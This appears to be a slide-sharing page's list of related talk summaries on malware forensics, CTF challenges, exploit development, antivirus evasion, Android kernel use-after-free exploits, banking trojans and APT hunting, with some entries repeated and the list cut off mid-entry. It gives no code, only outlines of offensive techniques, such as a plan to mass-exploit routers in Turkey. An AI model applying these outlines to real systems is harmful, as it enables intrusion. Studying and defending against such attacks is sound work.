Michał Wodyński, python developer w PGS Software opowiedział o najlepszych praktykach bezpieczeństwa na spotkaniu wroc.py w styczniu 2019 we Wrocławiu.
Acceleration of Statistical Detection of Zero-day Malware in the Memory Dump ...Igor Korkin
This paper focuses on the anticipatory enhancement of methods of detecting stealth software. Cyber security detection tools are insufficiently powerful to reveal the most recent cyber-attacks which use malware. In this paper, we will present first an idea of the highest stealth malware, as this is the most complicated scenario for detection because it combines both existing anti-forensic techniques together with their potential improvements. Second, we present new detection methods, which are resilient to this hidden prototype. To help solve this detection challenge, we have analyzed Windows memory content using a new method of Shannon Entropy calculation; methods of digital photogrammetry; the Zipf–Mandelbrot law, as well as by disassembling the memory content and analyzing the output. Finally, we present an idea and architecture of the software tool, which uses CUDA-enabled GPU hardware to speed-up memory forensics. All three ideas are currently a work in progress.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
Volatility is an open source memory forensics tool that analyzes RAM dumps to detect malware. It supports Windows, Linux, Mac and Android and uses plugins to parse memory images and extract useful information. Some key things Volatility can do include detecting injected code, unpacked files, hooks, and kernel driver modifications left by malware in memory. It allows analyzing ransomware locked systems, unpacking encrypted files, and dumping executable content of running processes for further reverse engineering.
This document outlines a plan to hack routers by exploiting vulnerabilities. The plan involves deciding targets, finding vulnerabilities in routers like the AirTies RT series, writing exploits in MIPS assembly to achieve remote code execution, writing scripts for mass exploitation, running attacks on targets in Turkey, and analyzing results. Routers are attractive targets because they are directly internet accessible, can control all traffic once compromised, have limited logging capabilities, and rarely receive security updates.
The document discusses developing an exploit from a vulnerability and integrating it into the Metasploit framework. It covers finding a buffer overflow vulnerability in an application called "Free MP3 CD Ripper", using tools like ImmunityDebugger and Mona.py to crash the application and gain control of EIP. It then shows using Mona.py to generate an exploit, testing it works, and submitting it to the Metasploit framework. It also provides an overview of Meterpreter and its capabilities.
This document discusses secure coding practices related to timing attacks, random number generation, and string security. It provides examples of vulnerabilities in Java timing attacks, OpenSSL and .NET random number generation, and recommendations for using cryptographically secure random number generators and constant time comparisons to mitigate timing attacks.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Hackersuli - Linux game hacking with LD_PRELOADhackersuli
This document discusses using LD_PRELOAD and DYLD_INSERT_LIBRARIES to inject code into processes via shared object preloading on Linux and macOS respectively. It provides examples of modifying system calls and injecting code into applications at runtime. It also explains how to compile shared objects for injection and discusses some techniques for preventing injection, such as using setuid/setgid bits.
Acceleration of Statistical Detection of Zero-day Malware in the Memory Dump ...Igor Korkin
This paper focuses on the anticipatory enhancement of methods of detecting stealth software. Cyber security detection tools are insufficiently powerful to reveal the most recent cyber-attacks which use malware. In this paper, we will present first an idea of the highest stealth malware, as this is the most complicated scenario for detection because it combines both existing anti-forensic techniques together with their potential improvements. Second, we present new detection methods, which are resilient to this hidden prototype. To help solve this detection challenge, we have analyzed Windows memory content using a new method of Shannon Entropy calculation; methods of digital photogrammetry; the Zipf–Mandelbrot law, as well as by disassembling the memory content and analyzing the output. Finally, we present an idea and architecture of the software tool, which uses CUDA-enabled GPU hardware to speed-up memory forensics. All three ideas are currently a work in progress.
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
Volatility is an open source memory forensics tool that analyzes RAM dumps to detect malware. It supports Windows, Linux, Mac and Android and uses plugins to parse memory images and extract useful information. Some key things Volatility can do include detecting injected code, unpacked files, hooks, and kernel driver modifications left by malware in memory. It allows analyzing ransomware locked systems, unpacking encrypted files, and dumping executable content of running processes for further reverse engineering.
This document outlines a plan to hack routers by exploiting vulnerabilities. The plan involves deciding targets, finding vulnerabilities in routers like the AirTies RT series, writing exploits in MIPS assembly to achieve remote code execution, writing scripts for mass exploitation, running attacks on targets in Turkey, and analyzing results. Routers are attractive targets because they are directly internet accessible, can control all traffic once compromised, have limited logging capabilities, and rarely receive security updates.
The document discusses developing an exploit from a vulnerability and integrating it into the Metasploit framework. It covers finding a buffer overflow vulnerability in an application called "Free MP3 CD Ripper", using tools like ImmunityDebugger and Mona.py to crash the application and gain control of EIP. It then shows using Mona.py to generate an exploit, testing it works, and submitting it to the Metasploit framework. It also provides an overview of Meterpreter and its capabilities.
This document discusses secure coding practices related to timing attacks, random number generation, and string security. It provides examples of vulnerabilities in Java timing attacks, OpenSSL and .NET random number generation, and recommendations for using cryptographically secure random number generators and constant time comparisons to mitigate timing attacks.
Linux Security APIs and the Chromium SandboxPatricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers. However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context.
The Chromium Sandbox is used in the Vivaldi, Brave, Chrome and Opera browsers among others. It has a very platform specific implementation, using the platform APIs available to construct it. In this talk we will describe the requirements of the Chromium Sandbox and go through the steps and APIs used to construct it on Linux.
Hackersuli - Linux game hacking with LD_PRELOADhackersuli
This document discusses using LD_PRELOAD and DYLD_INSERT_LIBRARIES to inject code into processes via shared object preloading on Linux and macOS respectively. It provides examples of modifying system calls and injecting code into applications at runtime. It also explains how to compile shared objects for injection and discusses some techniques for preventing injection, such as using setuid/setgid bits.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
Ведущий: Асука Накадзима (Asuka Nakajima)
Практика повторного использования исходного кода позволяет сократить расходы на разработку программного обеспечения. Тем не менее, если в оригинальном исходном коде кроется уязвимость, она будет перенесена и в новое приложение. Докладчик расскажет о необычном способе обнаружения «наследуемых» уязвимостей в бинарных файлах без необходимости обращаться к исходному коду или символьным файлам.
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated a malware analysis system, and Intelligence to use this tool, at Department of Scientific Criminal Investigation in SungKyunKwan University in Korea.
- The document discusses exploiting unconventional use-after-free (UAF) bugs in the Android kernel perf system to gain root privileges on Android devices.
- It describes two UAF bugs, CVE-2016-6787 and CVE-2017-0403, that are difficult to exploit due to lack of control over freed objects and inability to achieve code execution.
- Novel exploitation techniques are proposed, such as freezing threads to gain time to refill freed objects for CVE-2016-6787 and compromising the pipe subsystem to achieve arbitrary kernel writes for CVE-2017-0403.
This document discusses use-after-free attacks and ways to prevent them. It begins with an introduction to dynamic memory allocation and how freed memory can be reallocated. It then explains how dangling pointers can be used to hijack memory and execute arbitrary code through use-after-free vulnerabilities. Several real-world examples are provided. The document discusses various techniques programmers can use to prevent these attacks, such as smart pointers, immediately nullifying freed pointers, and compiler security checks. It also covers operating system defenses like Control Flow Guard on Windows and AddressSanitizer on Linux. The talk concludes with recommendations on comprehensive mitigations through secure coding practices and system hardening.
Advanced Evasion Techniques by Win32/GapzAlex Matrosov
The document discusses advanced evasion techniques used by the Win32/Gapz malware. It describes how Gapz uses droppers, bootkits, and rootkit functionality for stealthy infection. The dropper uses PowerLoader and code injection into explorer.exe to bypass detection. The bootkit modifies the MBR and VBR to load at early boot stages. The rootkit implements hidden storage, process injection, and covert network communication channels.
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
Industroyer is the first ever malware specifically designed to attack power grids. This unique and extremely dangerous malware framework was involved in the December 2016 blackout in Ukraine. What sets Industroyer apart from other malware targeting infrastructure, such as BlackEnergy (a.k.a. SandWorm), is its ability to control switches and circuit breakers directly via 4 different industrial communication protocols.
In addition to explaining why Industroyer can be considered the biggest threat to industrial control systems since the infamous Stuxnet worm, we will take a look at the 2016 power outage in the context of the other numerous cyberattacks against Ukrainian critical infrastructure in the recent years.
As the protocols and hardware targeted by Industroyer are employed in power supply infrastructure, transportation control systems, and other critical infrastructure systems, like water and gas, worldwide, the malware can be re-purposed to target vital services in other countries. This discovery should serve as a wake-up call for those responsible for security of these critical systems.
Anton Cherepanov
Anton Cherepanov is currently working at ESET as Senior Malware Researcher; his responsibilities include the analysis of complex threats. He has done extensive research on cyber-attacks in Ukraine. His research was presented on numerous conferences, including Virus Bulletin, CARO Workshop, PHDays, and ZeroNights. His interests focus on reverse engineering and malware analysis automation.
Róbert Lipovský
Róbert Lipovský is Senior Malware Researcher in ESET’s Security Research Laboratory, with 10 years’ experience with malware research. He is responsible for malware intelligence and analysis and leads the Malware Research team in ESET’s HQ in Bratislava. He is a regular speaker at security conferences, including Black Hat, Virus Bulletin, and CARO. He runs a reverse engineering course at the Slovak University of Technology, his alma mater and the Comenius University. When not bound to a keyboard, he enjoys sports, playing guitar and flying an airplane.
This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
Ведущий: Иван Ёлкин
Ведущий фаст-трека расскажет об опыте внедрения Static Analysis Security Tool в QIWI, о сложностях, с которыми сталкивались разработчики. Писать «костыли» или рефакторить код? Что делать, когда мнения клиента и разработчика расходятся? Поведает, сколько строк кода пришлось прочитать и написать до и после запуска сканера, и предложит краткий обзор найденных и упущенных уязвимостей.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
[CB16] DeathNote of Microsoft Windows Kernel by Peter Hlavaty & Jin LongCODE BLUE
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
--- Peter Hlavaty
Peter is a Lead for Windows Kernel Research at Keen Lab of Tencent (originally known as KEEN Team). With primary focus on vulnerability discovery and novel exploitation techniques dev. Presenting his research on various conferences such as Recon, Syscan, ZeroNights, NoSuchCon and others. Prior to Keen, Peter was AV (ESET) guy, with 4+ years of experience in that field switched to offensive software security research focused on windows and linux kernel architectures. Pwnie nominee and pwn2own 2015 & 2016(MoP) winner, occasionally CTF player. Besides software security field, doing his best as wushu player as well.
--- Jin Long 金龙
Tencent Keen Security Lab researcher, 6 years programming experience, 4 years security experience. Former TrendMicro employee, now focused on Windows security research at Keen Security Lab. Pwn2Own 2016 winner (Master of Pwn by final Edge to SYSTEM escape).
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Malware analysis - What to learn from your invadersTazdrumm3r
This document outlines a presentation on malware analysis. It discusses analyzing samples of phishing emails to learn about malware behavior. The speaker will demonstrate using tools like VirtualBox, Remnux, Regshot and Wireshark to perform static and behavioral analysis of malware samples. Network and host-based analysis will be used to observe a sample's network activity and changes it makes to the system. Resources for continuing malware research are also provided.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Detection index learning based on cyber threat intelligence and its applicati...CODE BLUE
While the importance of sharing cyber threat intelligence (CTI) and considering countermeasures in advance as cyber attacks become more sophisticated is increasing, IP addresses and domains as detection indices included in CTI are attacked by attackers in short cycles Dispose (change or disappear). As a countermeasure on the defender side, we are moving towards increasing the cost of attackers by improving the sharing speed of CTI, and we receive large amounts of CTI every day. As a result, the situation is such that the CTI is also disposable in a short cycle. In this report, we built a detection index learning method based on CTI that is accumulated day by day and implemented a detection index learning engine learning how detection indices are used by attackers Report on the learning result. We also report on the possibility of reconstructing and combining the result of learning the detection index and applying it to mid- to long-term advanced protection in combination with another data source.
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
The document provides security tips and best practices for building web applications in Go. It discusses Go's type system, concurrency model, and standard library features. It also summarizes common vulnerabilities like SQL injection and XSS, and recommends using parameterized queries and HTML escaping to prevent them. Finally, it highlights tools like Gorilla and Gin web frameworks, and techniques like rate limiting and secure cookies to build secure Go applications.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
Ведущий: Асука Накадзима (Asuka Nakajima)
Практика повторного использования исходного кода позволяет сократить расходы на разработку программного обеспечения. Тем не менее, если в оригинальном исходном коде кроется уязвимость, она будет перенесена и в новое приложение. Докладчик расскажет о необычном способе обнаружения «наследуемых» уязвимостей в бинарных файлах без необходимости обращаться к исходному коду или символьным файлам.
Automated Malware Analysis and Cyber Security IntelligenceJason Choi
This presentation is an introduction to Cuckoo Sandbox, an automated a malware analysis system, and Intelligence to use this tool, at Department of Scientific Criminal Investigation in SungKyunKwan University in Korea.
- The document discusses exploiting unconventional use-after-free (UAF) bugs in the Android kernel perf system to gain root privileges on Android devices.
- It describes two UAF bugs, CVE-2016-6787 and CVE-2017-0403, that are difficult to exploit due to lack of control over freed objects and inability to achieve code execution.
- Novel exploitation techniques are proposed, such as freezing threads to gain time to refill freed objects for CVE-2016-6787 and compromising the pipe subsystem to achieve arbitrary kernel writes for CVE-2017-0403.
This document discusses use-after-free attacks and ways to prevent them. It begins with an introduction to dynamic memory allocation and how freed memory can be reallocated. It then explains how dangling pointers can be used to hijack memory and execute arbitrary code through use-after-free vulnerabilities. Several real-world examples are provided. The document discusses various techniques programmers can use to prevent these attacks, such as smart pointers, immediately nullifying freed pointers, and compiler security checks. It also covers operating system defenses like Control Flow Guard on Windows and AddressSanitizer on Linux. The talk concludes with recommendations on comprehensive mitigations through secure coding practices and system hardening.
Advanced Evasion Techniques by Win32/GapzAlex Matrosov
The document discusses advanced evasion techniques used by the Win32/Gapz malware. It describes how Gapz uses droppers, bootkits, and rootkit functionality for stealthy infection. The dropper uses PowerLoader and code injection into explorer.exe to bypass detection. The bootkit modifies the MBR and VBR to load at early boot stages. The rootkit implements hidden storage, process injection, and covert network communication channels.
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
Industroyer is the first ever malware specifically designed to attack power grids. This unique and extremely dangerous malware framework was involved in the December 2016 blackout in Ukraine. What sets Industroyer apart from other malware targeting infrastructure, such as BlackEnergy (a.k.a. SandWorm), is its ability to control switches and circuit breakers directly via 4 different industrial communication protocols.
In addition to explaining why Industroyer can be considered the biggest threat to industrial control systems since the infamous Stuxnet worm, we will take a look at the 2016 power outage in the context of the other numerous cyberattacks against Ukrainian critical infrastructure in the recent years.
As the protocols and hardware targeted by Industroyer are employed in power supply infrastructure, transportation control systems, and other critical infrastructure systems, like water and gas, worldwide, the malware can be re-purposed to target vital services in other countries. This discovery should serve as a wake-up call for those responsible for security of these critical systems.
Anton Cherepanov
Anton Cherepanov is currently working at ESET as Senior Malware Researcher; his responsibilities include the analysis of complex threats. He has done extensive research on cyber-attacks in Ukraine. His research was presented on numerous conferences, including Virus Bulletin, CARO Workshop, PHDays, and ZeroNights. His interests focus on reverse engineering and malware analysis automation.
Róbert Lipovský
Róbert Lipovský is Senior Malware Researcher in ESET’s Security Research Laboratory, with 10 years’ experience with malware research. He is responsible for malware intelligence and analysis and leads the Malware Research team in ESET’s HQ in Bratislava. He is a regular speaker at security conferences, including Black Hat, Virus Bulletin, and CARO. He runs a reverse engineering course at the Slovak University of Technology, his alma mater and the Comenius University. When not bound to a keyboard, he enjoys sports, playing guitar and flying an airplane.
This document provides an overview of modern evasion techniques for bypassing network defenses. It discusses using PowerShell, macros, and C# to generate payloads that can evade detection from antivirus vendors like Palo Alto, Fortinet, Cisco, and Proofpoint. Specific evasion tactics covered include obfuscating payloads, customizing Meterpreter, using Empire instead of Metasploit, modifying templates, and delivering payloads via links instead of attachments. The document demonstrates how to generate custom C# payloads, use PowerShell to bypass defenses, and encrypt payloads with Ebowla. It recommends tools like MSF, Empire, Pupy, Unicorn, and Ebowla for evasion and
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
Ведущий: Иван Ёлкин
Ведущий фаст-трека расскажет об опыте внедрения Static Analysis Security Tool в QIWI, о сложностях, с которыми сталкивались разработчики. Писать «костыли» или рефакторить код? Что делать, когда мнения клиента и разработчика расходятся? Поведает, сколько строк кода пришлось прочитать и написать до и после запуска сканера, и предложит краткий обзор найденных и упущенных уязвимостей.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
[CB16] DeathNote of Microsoft Windows Kernel by Peter Hlavaty & Jin LongCODE BLUE
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
--- Peter Hlavaty
Peter is a Lead for Windows Kernel Research at Keen Lab of Tencent (originally known as KEEN Team). With primary focus on vulnerability discovery and novel exploitation techniques dev. Presenting his research on various conferences such as Recon, Syscan, ZeroNights, NoSuchCon and others. Prior to Keen, Peter was AV (ESET) guy, with 4+ years of experience in that field switched to offensive software security research focused on windows and linux kernel architectures. Pwnie nominee and pwn2own 2015 & 2016(MoP) winner, occasionally CTF player. Besides software security field, doing his best as wushu player as well.
--- Jin Long 金龙
Tencent Keen Security Lab researcher, 6 years programming experience, 4 years security experience. Former TrendMicro employee, now focused on Windows security research at Keen Security Lab. Pwn2Own 2016 winner (Master of Pwn by final Edge to SYSTEM escape).
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Malware analysis - What to learn from your invadersTazdrumm3r
This document outlines a presentation on malware analysis. It discusses analyzing samples of phishing emails to learn about malware behavior. The speaker will demonstrate using tools like VirtualBox, Remnux, Regshot and Wireshark to perform static and behavioral analysis of malware samples. Network and host-based analysis will be used to observe a sample's network activity and changes it makes to the system. Resources for continuing malware research are also provided.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document describes a simulated hacking game scenario involving a compromised POS terminal infected with malware. It details the components of the botnet architecture including bot nodes, command and control infrastructure, and social media propagation. Diagrams show the network layout and communication channels. The document also examines the bot's components, capabilities, and protection mechanisms such as bytecode encryption and anti-debugging techniques. Hints are provided to help players progress in the game by bypassing defenses and achieving objectives over multiple days.
Detection index learning based on cyber threat intelligence and its applicati...CODE BLUE
